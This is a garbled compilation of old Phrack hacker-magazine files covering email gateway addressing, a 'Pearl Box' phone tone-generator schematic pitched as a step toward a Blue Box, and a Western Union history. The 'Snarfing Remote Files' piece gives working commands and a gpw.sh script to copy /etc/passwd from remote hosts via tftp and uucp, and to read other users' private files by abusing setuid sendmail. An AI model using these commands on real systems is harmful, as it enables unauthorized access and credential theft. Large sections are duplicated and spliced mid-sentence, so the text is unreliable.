the letters and that letter ended up getting read by system administrators who
then informed me that I was not to be using that system, as well as the fact
that they would like to bill me for using it.  That was an interesting thought
on their part anyway, but do note that using this service does incur charges.
 
The CMR mailbox address in each system corresponds to the label:
 
          Telemail:  [Intermail/USCISI]TELEMAIL/USA
          MCI-Mail:  Intermail      or      107-8239
          CompMail:  Intermail      or      CMP0817
          NSF-Mail:  Intermail      or      NSF153
         USDA-Mail:  Intermail      or      AGS9999
 
Addressing examples for each e-mail system are as follows:
 
MCIMAIL:
   123-4567             seven digit address
   Everett T. Bowens    person's name (must be unique!)
 
COMPMAIL:
   CMP0123              three letters followed by three or four digits
   S.Cooper             initial, then "." and then last name
   134:CMP0123          domain, then ":" and then combination system and
                        account number
 
NSFMAIL:
   NSF0123              three letters followed by three or four digits
   A.Phillips           initial, then "." and then last name
   157:NSF0123          domain, then ":" and then combination system and
                         account number
 
USDAMAIL:
   AGS0123              three letters followed by three or four digits
   P.Shifter            initial, then "." and then last name
   157:AGS0123          domain, then ":" and then combination system and
                         account number
 
TELEMAIL:
   BARNOC               user (directly on Telemail)
   BARNOC/LODH          user/organization (directly on Telemail)
   [BARNOC/LODH]TELEMAIL/USA
                         [user/organization]system branch/country
 
The following are other Telenet system branches/countries that can be mailed
to:
 
TELEMAIL/USA     NASAMAIL/USA     MAIL/USA            TELEMEMO/AUSTRALIA
TELECOM/CANADA   TOMMAIL/CHILE    TMAILUK/GB          ITALMAIL/ITALY
ATI/JAPAN        PIPMAIL/ROC      DGC/USA             FAAMAIL/USA
GSFC/USA         GTEMAIL/USA      TM11/USA            TNET.TELEMAIL/USA
USDA/USA
 
     Note:  OMNET's ScienceNet is on the Telenet system MAIL/USA and to mail to
it, the format would be [A.MAILBOX/OMNET]MAIL/USA.  The following are available
subdivisions of OMNET:
 
         AIR     Atmospheric Sciences
         EARTH   Solid Earth Sciences
         LIFE    Life Sciences
         OCEAN   Ocean Sciences
         POLAR   Interdisciplinary Polar Studies
         SPACE   Space Science and Remote Sensing
 
The following is a list of DIALCOM systems available in the listed countries
with their domain and system numbers:
 
Service Name            Country             Domain Number    System Number
~~~~~~~~~~~~            ~~~~~~~             ~~~~~~~~~~~~~    ~~~~~~~~~~~~~
Keylink-Dialcom         Australia           60               07, 08, 09
Dialcom                 Canada              20               20, 21, 22, 23, 24
DPT Databoks            Denmark             124              71
Telebox                 Finland             127              62
Telebox                 West Germany        30               15, 16
Dialcom                 Hong Kong           80               88, 89
Eirmail                 Ireland             100              74
Goldnet                 Israel              50               05, 06
Mastermail              Italy               130              65, 67
Mastermail              Italy               1                66, 68
Dialcom                 Japan               70               13, 14
Dialcom                 Korea               1                52
Telecom Gold            Malta               100              75
Dialcom                 Mexico              1                52
Memocom                 Netherlands         124              27, 28, 29
Memocom                 Netherlands         1                55
Starnet                 New Zealand         64               01, 02
Dialcom                 Puerto Rico         58               25
Telebox                 Singapore           88               10, 11, 12
Dialcom                 Taiwan              1                52
Telecom Gold            United Kingdom      100              01, 04, 17,
80-89
DIALCOM                 USA                 1                29, 30, 31, 32,
                                                             33, 34, 37, 38,
                                                             41-59, 61, 62, 63,
                                                             90-99
 
 NOTE:  You can also mail to username@NASAMAIL.NASA.GOV or
        username@GSFCMAIL.NASA.GOV instead of going through the CMR gateway to
        mail to NASAMAIL or GSFCMAIL.
 
For more information and instructions on how to use CMR, send a message to the
user support group at intermail-request@intermail.isi.edu (you'll get basically
what I've listed plus maybe a bit more).  Please read Chapter 3 of The Future
Transcendent Saga (Limbo to Infinity) for specifics on mailing to these
destination mailing systems.
 
COMPUSERVE
~~~~~~~~~~
CompuServe is well known for its games and conferences.  It does, though, have
mailing capability.  Now, they have developed their own Internet domain, called
COMPUSERVE.COM.  It is relatively new and mail can be routed through either
TUT.CIS.OHIO-STATE.EDU or NORTHWESTERN.ARPA.
 
Example: user%COMPUSERVE.COM@TUT.CIS.OHIO-STATE.EDU or replace
         TUT.CIS.OHIO-STATE.EDU with NORTHWESTERN.ARPA).
 
The CompuServe link appears to be a polled UUCP connection at the gateway
machine.  It is actually managed via a set of shell scripts and a comm utility
called xcomm, which operates via command scripts built on the fly by the shell
scripts during analysis of what jobs exist to go into and out of CompuServe.
 
CompuServe subscriber accounts of the form 7xxxx,yyyy can be addressed as
7xxxx.yyyy@compuserve.com.  CompuServe employees can be addressed by their
usernames in the csi.compuserve.com subdomain.  CIS subscribers write mail to
">inet:user@host.domain" to mail to users on the Wide-Area Networks, where
">gateway:" is CompuServe's internal gateway access syntax.  The gateway
generates fully-RFC-compliant headers.
 
To fully extrapolate -- from the CompuServe side, you would use their EasyPlex
mail system to send mail to someone in BITNET or the Internet.   For example,
to send me mail at my Bitnet id, you would address it to:
 
            INET:C488869%UMCVMB.BITNET@CUNYVM.CUNY.EDU
 
Or to my Internet id:
 
            INET:C488869@UMCVMB.MISSOURI.EDU
 
Now, if you have a BITNET to Internet userid, this is a silly thing to do,
since your connect time to CompuServe costs you money.  However, you can use
this information to let people on CompuServe contact YOU.  CompuServe Customer
Service says that there is no charge to either receive or send a message to the
Internet or BITNET.
 
DASNET
~~~~~~
DASnet is a smaller network that connects to the Wide-Area Networks but charges
for their service.  DASnet subscribers get charged for both mail to users on
other networks AND mail for them from users of other networks.  The following
is a brief description of DASnet, some of which was taken from their
promotional text letter.
 
DASnet allows you to exchange electronic mail with people on more than 20
systems and networks that are interconnected with DASnet.  One of the
drawbacks, though, is that, after being subscribed to these services, you must
then subscribe to DASnet, which is a separate cost.  Members of Wide-Area
networks can subscribe to DASnet too.  Some of the networks and systems
reachable through DASnet include the following:
 
     ABA/net, ATT Mail, BIX (Byte Information eXchange), DASnet Network,
     Dialcom, EIES, EasyLink, Envoy 100, FAX, GeoMail, INET, MCI Mail, NWI,
     PeaceNet/EcoNet, Portal Communications, The Meta Network, The Source,
     Telemail, ATI's Telemail (Japan), Telex, TWICS (Japan), UNISON, UUCP, The
     WELL, and Domains (i.e. ".COM" and ".EDU" etc.).  New systems are added
     all of the time.  As of the writing of this file, Connect, GoverNET,
     MacNET, and The American Institute of Physics PI-MAIL are soon to be
     connected.
 
You can get various accounts on DASnet including:
 
  o  Corporate Accounts -- If your organization wants more than one individual
                           subscription.
  o  Site Subscriptions -- If you want DASnet to link directly to your
                           organization's electronic mail system.
 
To send e-mail through DASnet, you send the message to the DASnet account on
your home system.  You receive e-mail at your mailbox, as you do now.  On the
Wide-Area Networks, you send mail to XB.DAS@STANFORD.BITNET.  On the Subject:
line, you type the DASnet address in brackets and then the username just
outside of them.  The real subject can be expressed after the username
separated by a "!"  (Example:  Subject:  [0756TK]randy!How's Phrack?).
 
The only disadvantage of using DASnet as opposed to Wide-Area networks is the
cost.  Subscription costs as of 3/3/89 cost $4.75 per month or $5.75 per month
for hosts that are outside of the U.S.A.
 
You are also charged for each message that you send.  If you are corresponding
with someone who is not a DASnet subscriber, THEIR MAIL TO YOU is billed to
your account.
 
The following is an abbreviated cost list for mailing to the different services
of DASnet:
 
     PARTIAL List                DASnet Cost    DASnet Cost
     of Services                  1st 1000    Each Add'l 1000
     Linked by DASnet (e-mail)   Characters     Characters:
 
     INET, MacNET, PeaceNet,                             NOTE:  20 lines
     Unison, UUCP*, Domains,        .21            .11   of text is app.
     e.g. .COM, .EDU*                                    1000 characters.
 
     Dialcom--Any "host" in U.S.    .36            .25
 
     Dialcom--Hosts outside U.S.    .93            .83
 
     EasyLink (From EasyLink)       .21            .11
              (To EasyLink)         .55            .23
 
     U.S. FAX (internat'l avail.)   .79            .37
 
     GeoMail--Any "host" in U.S.    .21            .11
     GeoMail--Hosts outside U.S.    .74            .63
 
     MCI  (from MCI)                .21            .11
          (to MCI)                  .78            .25
          (Paper mail - USA)       2.31            .21
 
     Telemail                       .36            .25
 
     W.U. Telex--United States     1.79           1.63
     (You can also send Telexes outside the U.S.)
 
     TWICS--Japan                   .89            .47
 
  *  The charges given here are to the gateway to the network.  The DASnet
     user is not charged for transmission on the network itself.
 
Subscribers to DASnet get a free DASnet Network Directory as well as a listing
in the directory, and the ability to order optional DASnet services like
auto-porting or DASnet Telex Service which gives you your own Telex number and
answerback for $8.40 a month at this time.
 
DASnet is a registered trademark of DA Systems, Inc.
 
                               DA Systems, Inc.
                             1503 E. Campbell Ave.
                              Campbell, CA  95008
                                 408-559-7434
                             TELEX:  910 380-3530
 
The following two sections on PeaceNet and AppleLink are in association with
DASnet as this network is what is used to connect00             Finland
Helsinki Telephone Co.     ELISA                   Finland
Dialcom                    Dialcom                 USA
Telenet                    Telemail                USA
KDD                        Messavia                Japan
Transpac                   ATLAS400                France
 
The interconnections are based on the X.400 standard, a set of guidelines for
the format, delivery and receipt of electronic messages recommended by an
international standards committee the CCITT.  International X.400 messages
incur a surcharge.  They are:
 
                 To Canada:
                    Per note:            $.05
                    Per message unit:    $.10
 
                 To other international locations:
                    Per note:            $.20
                    Per message unit:    $.50
 
There is no surcharge for X.400 messages within the U.S.  The following are
contacts to speak with about mailing through these mentioned networks.  Other
questions can be directed through AT&T Mail's toll-free number, 1-800-624-5672.
 
MHS Gateway:  mhs!atlas                     MHS Gateway:  mhs!dacom
Administrator:  Bernard Tardieu             Administrator:  Bob Nicholson
Transpac                                    AT&T
Phone:  3399283203                          Morristown, NJ  07960
Phone:  +1 201 644 1838
 
MHS Gateway:  mhs!dialcom                   MHS Gateway:  mhs!elisa
Administrator:  Mr. Laraman                 Administrator:  Ulla Karajalainen
Dialcom                                     Nokia Data
South Plainfield, NJ  07080                 Phone:  01135804371
Phone:  +1 441 493 3843
 
MHS Gateway:  mhs!envoy                     MHS Gateway:  mhs!kdd
Administrator:  Kin C. Ma                   Administrator:  Shigeo Lwase
Telecom Canada                              Kokusai Denshin Denwa CO.
Phone:  +1 613 567 7584                     Phone:  8133477419
 
MHS Gateway:  mhs!mailnet                   MHS Gateway:  mhs!otc
Administrator:  Kari Aakala                 Administrator:  Gary W. Krumbine
Gen Directorate Of Post &                   AT&T Information Systems
Phone:  35806921730                         Lincroft, NJ  07738
                                            Phone:  +1 201 576 2658
 
MHS Gateway:  mhs!telemail                  MHS Gateway:  mhs
Administrator:  Jim Kelsay                  Administrator:  AT&T Mail MHS
GTE Telenet Comm Corp                                       Gateway
Reston, VA  22096                           AT&T
Phone:  +1 703 689 6034                     Lincroft, NJ  08838
                                            Phone:  +1 800 624 5672
 
CMR
~~~
Previously known as Intermail, the Commercial Mail Relay (CMR) Service is a
mail relay service between the Internet and three commercial electronic mail
systems:  US Sprint/Telenet, MCI-Mail, and DIALCOM systems (i.e. Compmail,
NSFMAIL, and USDA-MAIL).
 
An important note:  The only requirement for using this mail gateway is that
the work conducted must be DARPA sponsored research and other approved
government business.  Basically, this means that unless you've got some
government-related business, you're not supposed to be using this gateway.
Regardless, it would be very difficult for them to screen everything that goes
through their gateway.  Before I understood the requirements of this gateway, I
was sending to a user of MCI-Mail and was not contacted about any problems with
that communication.  Unfortunately, I mistyped the MCI-Mail address on one of
the letters and that letter ended up getting read by system administrators who
then informed me that I was not to be using that system, as well as the fact
that they would like to bill me for using it.  That was an interesting thought
on their part anyway, but do note that using this service does incur charges.
 
The CMR mailbox address in each system corresponds to the label:
 
          Telemail:  [Intermail/USCISI]TELEMAIL/USA
          MCI-Mail:  Intermail      or      107-8239
          CompMail:  Intermail      or      CMP0817
          NSF-Mail:  Intermail      or      NSF153
         USDA-Mail:  Intermail      or      AGS9999
 
Addressing examples for each e-mail system are as follows:
 
MCIMAIL:
   123-4567             seven digit address
   Everett T. Bowens    person's name (must be unique!)
 
COMPMAIL:
   CMP0123              three letters followed by three or four digits
   S.Cooper             initial, then "." and then last name
   134:CMP0123          domain, then ":" and then combination system and
                        account number
 
NSFMAIL:
   NSF0123              three letters followed by three or four digits
   A.Phillips           initial, then "." and then last name
   157:NSF0123          domain, then ":" and then combination system and
                         account number
 
USDAMAIL:
   AGS0123              three letters followed by three or four digits
   P.Shifter            initial, then "." and then last name
   157:AGS0123          domain, then ":" and then combination system and
                         account number
 
TELEMAIL:
   BARNOC               user (directly on Telemail)
   BARNOC/LODH          user/organization (directly on Telemail)
   [BARNOC/LODH]TELEMAIL/USA
                         [user/organization]system branch/country
 
The following are other Telenet system branches/countries that can be mailed
to:
 
TELEMAIL/USA     NASAMAIL/USA     MAIL/USA            TELEMEMO/AUSTRALIA
TELECOM/CANADA   TOMMAIL/CHILE    TMAILUK/GB          ITALMAIL/ITALY
ATI/JAPAN        PIPMAIL/ROC      DGC/USA             FAAMAIL/USA
GSFC/USA         GTEMAIL/USA      TM11/USA            TNET.TELEMAIL/USA
USDA/USA
 
     Note:  OMNET's ScienceNet is on the Telenet system MAIL/USA and to mail to
it, the format would be [A.MAILBOX/OMNET]MAIL/USA.  The following are available
subdivisions of OMNET:
 
         AIR     Atmospheric Sciences
         EARTH   Solid Earth Sciences
         LIFE    Life Sciences
         OCEAN   Ocean Sciences
         POLAR   Interdisciplinary Polar Studies
         SPACE   Space Science and Remote Sensing
 
The following is a list of DIALCOM systems available in the listed countries
with their domain and system numbers:
 
Service Name            Country             Domain Number    System Number
~~~~~~~~~~~~            ~~~~~~~             ~~~~~~~~~~~~~    ~~~~~~~~~~~~~
Keylink-Dialcom         Australia           60               07, 08, 09
Dialcom                 Canada              20               20, 21, 22, 23, 24
DPT Databoks            Denmark             124              71
Telebox                 Finland             127              62
Telebox                 West Germany        30               15, 16
Dialcom                 Hong Kong           80               88, 89
Eirmail                 Ireland             100              74
Goldnet                 Israel              50               05, 06
Mastermail              Italy               130              65, 67
Mastermail              Italy               1                66, 68
Dialcom                 Japan               70               13, 14
Dialcom                 Korea               1                52
Telecom Gold            Malta               100              75
Dialcom                 Mexico              1                52
Memocom                 Netherlands         124              27, 28, 29
Memocom                 Netherlands         1                55
Starnet                 New Zealand         64               01, 02
Dialcom                 Puerto Rico         58               25
Telebox                 Singapore           88               10, 11, 12
Dialcom                 Taiwan              1                52
Telecom Gold            United Kingdom      100              01, 04, 17,
80-89
DIALCOM                 USA                 1                29, 30, 31, 32,
                                                             33, 34, 37, 38,
                                                             41-59, 61, 62, 63,
                                                             90-99
 
 NOTE:  You can also mail to username@NASAMAIL.NASA.GOV or
        username@GSFCMAIL.NASA.GOV instead of going through the CMR gateway to
        mail to NASAMAIL or GSFCMAIL.
 
For more information and instructions on how to use CMR, send a message to the
user support group at intermail-request@intermail.isi.edu (you'll get basically
what I've listed plus maybe a bit more).  Please read Chapter 3 of The Future
Transcendent Saga (Limbo to Infinity) for specifics on mailing to these
destination mailing systems.
 
COMPUSERVE
~~~~~~~~~~
CompuServe is well known for its games and conferences.  It does, though, have
mailing capability.  Now, they have developed their own Internet domain, called
COMPUSERVE.COM.  It is relatively new and mail can be routed through either
TUT.CIS.OHIO-STATE.EDU or NORTHWESTERN.ARPA.
 
Example: user%COMPUSERVE.COM@TUT.CIS.OHIO-STATE.EDU or replace
         TUT.CIS.OHIO-STATE.EDU with NORTHWESTERN.ARPA).
 
The CompuServe link appears to be a polled UUCP connection at the gateway
machine.  It is actually managed via a set of shell scripts and a comm utility
called xcomm, which operates via command scripts built on the fly by the shell
scripts during analysis of what jobs exist to go into and out of CompuServe.
 
CompuServe subscriber accounts of the form 7xxxx,yyyy can be addressed as
7xxxx.yyyy@compuserve.com.  CompuServe employees can be addressed by their
usernames in the csi.compuserve.com subdomain.  CIS subscribers write mail to
">inet:user@host.domain" to mail to users on the Wide-Area Networks, where
">gateway:" is CompuServe's internal gateway access syntax.  The gateway
generates fully-RFC-compliant headers.
 
To fully extrapolate -- from the CompuServe side, you would use their EasyPlex
mail system to send mail to someone in BITNET or the Internet.   For example,
to send me mail at my Bitnet id, you would address it to:
 
            INET:C488869%UMCVMB.BITNET@CUNYVM.CUNY.EDU
 
Or to my Internet id:
 
            INET:C488869@UMCVMB.MISSOURI.EDU
 
Now, if you have a BITNET to Internet userid, this is a silly thing to do,
since your connect time to CompuServe costs you money.  However, you can use
this information to let people on CompuServe contact YOU.  CompuServe Customer
Service says that there is no charge to either receive or send a message to the
Internet or BITNET.
 
DASNET
~~~~~~
DASnet is a smaller network that connects to the Wide-Area Networks but charges
for their service.  DASnet subscribers get charged for both mail to users on
other networks AND mail for them from users of other networks.  The following
is a brief description of DASnet, some of which was taken from their
promotional text letter.
 
DASnet allows you to exchange electronic mail with people on more than 20
systems and networks that are interconnected with DASnet.  One of the
drawbacks, though, is that, after being subscribed to these services, you must
then subscribe to DASnet, which is a separate cost.  Members of Wide-Area
networks can subscribe to DASnet too.  Some of the networks and systems
reachable through DASnet include the following:
 
     ABA/net, ATT Mail, BIX (Byte Information eXchange), DASnet Network,
     Dialcom, EIES, EasyLink, Envoy 100, FAX, GeoMail, INET, MCI Mail, NWI,
     PeaceNet/EcoNet, Portal Communications, The Meta Network, The Source,
     Telemail, ATI's Telemail (Japan), Telex, TWICS (Japan), UNISON, UUCP, The
     WELL, and Domains (i.e. ".COM" and ".EDU" etc.).  New systems are added
     all of the time.  As of the writing of this file, Connect, GoverNET,
     MacNET, and The American Institute of Physics PI-MAIL are soon to be
     connected.
 
You can get various accounts on DASnet including:
 
  o  Corporate Accounts -- If your organization wants more than one individual
                           subscription.
  o  Site Subscriptions -- If you want DASnet to link directly to your
             SAGE **
<EOF>  There was an error in the transcieving.  Part was erased.  This is all
That was Salvageble...  Sorry..              -= Exodus =-
                                ==Phrack Inc.==
 
                     Volume Three, Issue 28, File #5 of 12
 
                  /////////////////////\\\\\\\\\\\\\\\\\\\\\
                 ||                                        ||
                 || A Real Functioning PEARL BOX Schematic ||
                 ||                                        ||
                 ||        Written, Tested, and Used       ||
                 ||                                        ||
                 ||               by Dispater              ||
                 ||                                        ||
                 ||              July 1, 1989              ||
                 ||                                        ||
                  \\\\\\\\\\\\\\\\\\\\\/////////////////////
 
 
Introduction:  After reading the earlier renditions of schematics for the Pearl
               Box, I decided that there was an easier and cheaper way of doing
               the same thing with an IC and parts you probably have just
               laying around the house.
 
 
What Is A Pearl Box and Why Do I Want One?
 
     A Pearl Box is a tone generating device that is used to make a wide range
     of single tones.  Therefore, it would be very easy to modify this basic
     design to make a Blue Box by making 2 Pearl Boxes and joining them
     together in some fashion.
 
     A Pearl Box can be used to create any tone you wish that other boxes may
     not.  It also has a tone sweep option that can be used for numerous things
     like detecting different types of phone tapping devices.
 
 
Parts List:
 
        CD4049 RCA integrated circuit
        .1 uF disk capacitor
        1 uF 16V electrolitic capacitor
        1K resistor
        10M resistor
        1meg pot
        1N914 diode
        Some SPST momentary push-button switches
        1 SPDT toggle switch
        9 Volt battery & clip
        and miscellaneous stuff you should have laying around the house.
 
 
State-of-the-Art-Text Schematic:
                                       +  16V  1uF -
              _______________________________||_____
             |        !     !                ||     |           _
             |   _______________________            |__________| |/| 8ohms
         ____|__|_____:__|__:__|_       |            __________| | |
        | 9 10 11 12 13 14 15 16 |      |           |          |_|\|
        |        CD4049UBE       |      |           |
        |_1__2__3__4__5__6__7__8_|      :           |          _
          |  |  |__|  |__|  |  |____________________|_________[-]
          |  |  !           !           :                     [b]
          |  |__________________________|                     [a]
          |     :           :           |                     [t]
          |     !    1N914  !           !                     [t]
          |___________|/|_____________________________________[+]
                :     |\|   :           :
                |           |           |
                |    10M    |           |
                |___/\/\/\__|           |
                |           |           |
                |_____||____|           |  <-- These 2 wires to the center pole
                      ||    |           |      of switch.
                 .1uF   50V |           |
                            |           |
     _______________________|           |_____________________________
    |                   ___[Toggle Switch]____________                |
    |                  |                              |          ___  |
    |                  |                              |          o o  |
    |                  |                              | /\/\/\___| |__|
    |_/\/\/\____/\/\/\ |                              |    ^          |
        1K         ^   |                              |____|     ___  |
                   |___|                              |          o o  |
                                                      | /\/\/\___| |__|
          (pAakala                 Administrator:  Gary W. Krumbine
Gen Directorate Of Post &                   AT&T Information Systems
Phone:  35806921730                         Lincroft, NJ  07738
                                            Phone:  +1 201 576 2658
 
MHS Gateway:  mhs!telemail                  MHS Gateway:  mhs
Administrator:  Jim Kelsay                  Administrator:  AT&T Mail MHS
GTE Telenet Comm Corp                                       Gateway
Reston, VA  22096                           AT&T
Phone:  +1 703 689 6034                     Lincroft, NJ  08838
                                            Phone:  +1 800 624 5672
 
CMR
~~~
Previously known as Intermail, the Commercial Mail Relay (CMR) Service is a
mail relay service between the Internet and three commercial electronic mail
systems:  US Sprint/Telenet, MCI-Mail, and DIALCOM systems (i.e. Compmail,
NSFMAIL, and USDA-MAIL).
 
An important note:  The only requirement for using this mail gateway is that
the work conducted

- Exodus -
                               ==Phrack Inc.==
 
                     Volume Three, Issue 28, File #6 of 12
                     +++++++++++++++++++++++++++++++++++++
                     +                                   +
                     +       Snarfing Remote Files       +
                     +                                   +
                     +                by                 +
                     +                                   +
                     +           Dark OverLord           +
                     +                                   +
                     +++++++++++++++++++++++++++++++++++++
 
There are many ways of getting copies of files from a remote system that you
do not have permission to read or an account on login on to and access them
through.  Many administrators do not even bother to restrict many access
points that you can use.
 
Here are the simplest ways:
 
 
A)  Use uucp(1) [Trivial File Transfer Protocol] to retrieve a copy
    of a file if you are running on an Internet based network.
 
B) Abuse uucp(1) [Unix to Unix Copy Program] to retrieve a copy of a file
   if uucp connections are running on that system.
 
C) Access one of many known security loopholes.
 
 
In the following examples, we will use the passwd file as the file to acquire
since it is a readable file that can be found on most systems that these
attacks are valid on.
 
Method A :
 
1) First start the tftp program:
    Enter the command:
 
 tftp
 
    [You have the following prompt:]
 
 tftp>
 
 
2) The next step is to connect to the system that you wish to retrieve files
    from.  At the tftp, type:
 
 tftp> connect other.system.com
 
 
3) Now request the file you wish to get a copy of (in our case, the
    passwd file /etc/passwd ):
 
 tftp> get /etc/passwd /tmp/passwd
 
    [You should see something that looks like the following:]
 
 Received 185659 bytes in 22 seconds.
 
4) Now exit the tftp program with the "quit" command:
 
 tftp> quit
 
You should now have a copy of other.system.com's passwd file in your directory.
 
NOTE:  Some Unix systems' tftp programs have a different syntax.  The above was
       tested under SunOS 4.0
 
For example, on Apollos, the syntax is:
 
    tftp -{g|g!|p|r|w} <local file> <host> <foreign file> [netascii|image]
 
Thus you must use the command:
 
 tftp -g password_file networked-host /etc/passwd
 
Consult your local "man" pages for more info (or in other words RTFM).
 
At the end of this article, I will include a shell script that will snarf a
password file from a remote host.  To use it type:
 
 gpw system_name
 
Method B :
 
Assuming we are getting the file  /etc/passwd  from the system uusucker, and
our system has a direct uucp connection to that system, it is possible to
request a copy of the file through the uucp links.  The following command will
request that a copy of the passwd file be copied into uucp's home directory
/usr/spool/uucppublic :
 
 uucp -m uusucker!/etc/passwd '>uucp/uusucker_passwd'
 
The flag "-m" means you will be notified by mail when the transfer is
completed.
 
Method C:
 
    The third possible way to access the desired file requires that you have
the login permission to the system.
 
In this case we will utilize a well-known bug in Unix's sendmail daemon.
 
The sendmail program has and option "-C" in which you can specify the
configuration file to use (by default this file is /usr/lib/sendmail.cf or
/etc/sendmail.cf).  It should also be noted that the diagnostics outputted by
sendmail contain the offending lines of text.  Also note that the sendmail
program runs setuid root.
 
The way you can abuse this set of facts (if you have not yet guessed) is by
specifying the file you wish read as the configuration file.  Thus the command:
 
 sendmail -C/usr/accounts/random_joe/private/file
 
Will give you a copy of random joe's private file.
 
Another similar trick is to symlink your .mailcf file to joe's file and mail
someone.  When mail executes sendmail (to send the mail), it will load in your
mailcf and barf out joe's stuff.
 
First, link joe's file to your .mailcf .
 
 ln -s /usr/accounts/random_joe/private/file $HOME/.mailcf
 
Next, send mail to someone.
 
 mail C488869@umcvmb.missouri.edu
 
And have fun.
 
-=-Cut Here=-=-=-Cut Here=-=-=- gpw.sh =-=-=-Cut Here=-=-=-=-Cut Here=-=-=-=-=
:
: gpw copyright(c) Dark Overlord
:
/usr/ucb/tftp $1 << EOF
mode ascii
verbose
trace
get /etc/passwd /tmp/pw.$1
quit
EOF
-=-Cut Here=-=-=-Cut Here=-=-=-Cut Here=-=-=-Cut Here=-=-=-=-Cut Here=-=-=-=-=
_______________________________________________________________________________

** END OF MESSAGE **
#EOI

<EOF>   Exodus


                                ==Phrack Inc==
 
                    Volume Three, Issue 30, File #10 of 12
 
                   =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                   ===                                   ===
                   ===           Western Union           ===
                   ===   Telex, TWX, and Time Service    ===
                   ===                                   ===
                   ===         by Phone Phanatic         ===
                   ===                                   ===
                   ===        September 17, 1989         ===
                   ===                                   ===
                   =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 
         "Until a few years ago -- maybe ten -- it was very common to
          see TWX and Telex machines in almost every business place."
 
There were only minor differences between Telex and TWX.  The biggest
difference was that the former was always run by Western Union, while the
latter was run by the Bell System for a number of years.  TWX literally meant
"(T)ype(W)riter e(x)change," and it was Bell's answer to competition from
Western Union.  There were "three row" and "four row" machines, meaning the
number of keys on the keyboard and how they were laid out.  The "three row"
machines were simply part of the regular phone network; that is, they could
dial out and talk to another TWX also connected on regular phone lines.
 
Eventually these were phased out in favor of "newer and more improved" machines
with additional keys, as well as a paper tape reader attachment which allowed
sending the same message repeatedly to many different machines.  These "four
row" machines were not on the regular phone network, but were assigned their
own area codes (410-510-610-710-810-910) where they still remain today.  The
only way a four row machine could call a three row machine or vice-versa was
through a gateway of sorts which translated some of the character set unique to
each machine.
 
Western Union's network was called Telex and in addition to being able to
contact (by dial up) other similar machines, Telex could connect with TWX (and
vice-versa) as well as all the Western Union public offices around the country.
Until the late 1950's or early 1960's, every small town in America had a
Western Union office.  Big cities like Chicago had perhaps a dozen of them, and
they used messengers to hand deliver telegrams around town.  Telegrams could be
placed in person at any public office, or could be called in to the nearest
public office.
 
By arrangement with most telcos, the Western Union office in town nearly always
had the phone number 4321, later supplemented in automated exchanges with some
prefix XXX-4321.  Telegrams could be charged to your home phone bill (this is
still the case in some communities) and from a coin phone, one did not ask for
4321, but rather, called the operator and asked for Western Union.  This was
necessary since once the telegram had been given verbally to the wire clerk,
s/he in turn had to flash the hook and get your operator back on the line to
tell them "collect five dollars and twenty cents" or whatever the cost was.
Telegrams, like phone calls, could be sent collect or billed third party.  If
you had an account with Western Union, i.e. a Telex machine in your office, you
could charge the calls there, but most likely you would simply send the
telegram from there in the first place.
 
Sometime in the early 1960's, Western Union filed suit against AT&T asking that
they turn over their TWX business to them.  They cited an earlier court ruling,
circa 1950's, which said AT&T was prohibited from acquiring any more telephone
operating companies except under certain conditions.  The Supreme Court agreed
with Western Union that "spoken messages" were the domain of Ma Bell, but
"written messages" were the domain of Western Union.  So Bell was required to
divest itself of the TWX network, and Western Union has operated it since,
although a few years ago they began phasing out the phrase "TWX" in favor of
"Telex II"; their original device being "Telex I" of course.  TWX still uses
ten digit dialing with 610 (Canada) or 710/910 (USA) being the leading three
digits.  Apparently 410-510 have been abandoned; or at least they are used very
little, and Bellcore has assigned 510 to the San Francisco area starting in a
year or so.  410 still has some funny things on it, like the Western Union
"Infomaster," which is a computer that functions like a gateway between Telex,
TWX, EasyLink and some other stuff.
 
Today, the Western Union network is but a skeleton of its former self.  Now
most of their messages are handled on dial up terminals connected to the public
phone network.  It has been estimated the TWX/Telex business is about fifty
percent of what it was a decade ago, if that much.
 
Then there was the Time Service, a neat thing which Western Union offered for
over seventy years, until it was discontinued in the middle 1960's.  The Time
Service provided an important function in the days before alternating current
was commonly available.  For example, Chicago didn't have AC electricity until
about 1945.  Prior to that we used DC, or direct current.
 
Well, to run an electric clock, you need 60 cycles AC current for obvious
reasons, so prior to the conversion from DC power to AC power, electric wall
clocks such as you see in every office were unheard of.  How were people to
tell the time of day accurately?  Enter the Western Union clock.
 
The Western Union, or "telegraph clock" was a spring driven wind up clock, but
with a difference.  The clocks were "perpetually self-winding," manufactured by
the Self-Winding Clock Company of New York City.  They had large batteries
inside them, known as "telephone cells" which had a life of about ten years
each.  A mechanical contrivance in the clock would rotate as the clock spring
unwound, and once each hour would cause two metal clips to contact for about
ten seconds, which would pass juice to the little motor in the clock which in
turn re-wound the main spring.  The principle was the same as the battery
operated clocks we see today.  The battery does not actually run the clock --
direct current can't do that -- but it does power the tiny motor which re-winds
the spring which actually drives the clock.
 
The Western Union clocks came in various sizes and shapes, ranging from the
smallest dials which were nine inches in diameter to the largest which were
about eighteen inches in diameter.  Some had sweep second hands; others did
not.  Some had a little red light bulb on the front which would flash.  The
typical model was about sixteen inches, and was found in offices, schools,
transportation depots, radio station offices, and of course in the telegraph
office itself.
 
The one thing all the clocks had in common was their brown metal case and
cream-colored face, with the insignia "Western Union" and their corporate logo
in those days which was a bolt of electricity, sort of like a letter "Z" laying
on its side.  And in somewhat smaller print below, the words "Naval Observatory
Time."
 
The local clocks in an office or school or wherever were calibrated by a
"master clock" (actually a sub-master) on the premises.  Once an hour on the
hour, the (sub) master clock would drop a metal contact for just a half second,
and send about nine volts DC up the line to all the local clocks.  They in turn
had a "tolerance" of about two minutes on both sides of the hour so that the
current coming to them would yank the minute hand exactly upright onto the
twelve from either direction if the clock was fast or slow.
 
The sub-master clocks in each building were in turn serviced by the master
clock in town; usually this was the one in the telegraph office.  Every hour on
the half hour, the master clock in the telegraph office would throw current to
the sub-masters, yanking them into synch as required.  And as for the telegraph
offices themselves, they were serviced twice a day by -- you guessed it -- the
Naval Observatory Master clock in Our Nation's Capitol, by the same routine.
Someone there would press half a dozen buttons at the same time, using all
available fingers; current would flow to every telegraph office and synch all
the master clocks in every community.  Western Union charged fifty cents per
month for the service, and tossed the clock in for free!  Oh yes, there was an
installation charge of about two dollars when you first had service (i.e. a
clock) installed.
 
The clocks were installed and maintained by the "clockman," a technician from
Western Union who spent his day going around hanging new clocks, taking them
out of service, changing batteries every few years for each clock, etc.
 
What a panic it was for them when "war time" (what we now call Daylight Savings
Time) came around each year!  Wally, the guy who serviced all the clocks in
